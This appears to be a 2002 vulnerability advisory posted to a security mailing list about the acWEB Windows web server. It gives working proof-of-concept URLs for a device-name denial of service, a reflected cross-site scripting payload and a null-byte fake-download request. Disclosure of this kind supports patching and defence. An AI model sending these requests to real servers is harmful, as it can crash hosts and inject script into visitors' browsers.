IIL Advisory: Vulnerabilities in acWEB HTTP server

From: DownBload (downbloadat_private)
Date: Wed Sep 25 2002 - 02:08:20 PDT

    	            [ Illegal Instruction Labs Advisory ]
    [-------------------------------------------------------------------------]
    Advisory name: Vulnerabilities in acWEB HTTP server
    Advisory number: 13
    Application: acWEB HTTP server
    Author e-mail: spfat_private
    Homepage: somewhere on sourceforge
    Date: 10.09.2002
    Impact: DoS, XSS, etc.
    Tested on: Windows 98
    Discovered by: DownBload
    Mail me @: downbloadat_private

    ======[ Overview

    Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other
    proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by
    viruses like CodeRed, Nimda, etc :)."

    /ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny
    companies, and for home use.

    ======[ Problem(s)

    ===[ Remote DoS
    First vulnerability which I discovered in acWEB HTTP server was remote DoS.
    It is possible to crush acWEB (and Windows too) with simple HTTP request:
    ---cut here---
    http://www.victim.com/com2.bat
    ---cut here---

    ===[ XSS a.k.a CSS bug
    XSS code execution:
    ---cut here---
    http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%
    200wnz%20YoU!!!');&lt;/script&gt;/
    ---cut here---

    ===[ Fake file download
    ---cut here---
    http://www.victim.com/|%5chacked.txt%00
    ---cut here---

    When this request it sent to acWEB HTTP server, acWEB will return:
    ---------------
    HTTP/1.0 200 OK
    Server: Eserv/3.x

    ---------------
    That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP
    server will
    send us 'hacked.txt' empty file to download.

    ======[ Exploit

    This can be exploited with browser, so I won't write exploit for this...or
    maybe one day :).

    ======[ Greetz

    Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>.
    Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis,
    Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org
    (NetZero & Paradox). I'm very sorry if I forgot someone.